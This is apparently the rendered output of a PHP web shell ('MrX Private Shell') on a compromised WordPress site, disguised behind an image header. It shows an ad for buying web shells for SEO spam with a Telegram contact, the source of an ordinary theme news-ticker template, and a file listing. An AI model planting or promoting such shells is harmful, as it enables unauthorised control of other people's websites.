����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// https://wordpress.org/themes/royale-news/
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
?>
<?php
$theme_options = pmthemes_theme_options();
$ticker_title = $theme_options['ticker_news_title'];
$ticker_args = array(
'posts_per_page' => $theme_options['ticker_news_count'],
'cat' => $theme_options['ticker_news_category'],
'post_type' => 'post',
'post_status' => 'publish'
);
$ticker_query = new WP_Query( $ticker_args );
if( $ticker_query->have_posts() ) :
?>
<div class="simple-ticker" id="js-ticker-fade">
<?php
if( !empty( $ticker_title ) ) :
?>
<ul>
<li>
<?php
echo esc_html( $ticker_title );
?>
</li>
</ul>
<?php
endif;
?>
<?php
while( $ticker_query->have_posts() ) :
$ticker_query->the_post();
?>
<ul>
<li>
<a href="<?php the_permalink();?>">
<?php the_title(); ?>
</a>
</li><!-- .ticker-news -->
</ul><!-- .item -->
<?php
endwhile;
wp_reset_postdata();
?>
</div>
<?php
endif;
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| content-excerpt.php | File | 563 B | 0644 |
|
| content-fullpost.php | File | 431 B | 0644 |
|
| content-page.php | File | 378 B | 0644 |
|
| content-product.php | File | 1.59 KB | 0644 |
|
| content-search.php | File | 541 B | 0644 |
|
| content-single.php | File | 762 B | 0644 |
|
| content-video.php | File | 1.53 KB | 0644 |
|
| content.php | File | 616 B | 0644 |
|
| featured-content-slider.php | File | 2.26 KB | 0644 |
|
| main-navigation.php | File | 1.13 KB | 0644 |
|
| news-ticker.php | File | 1.71 KB | 0644 |
|
| top-bar.php | File | 678 B | 0644 |
|
| top-navigation.php | File | 1.41 KB | 0644 |
|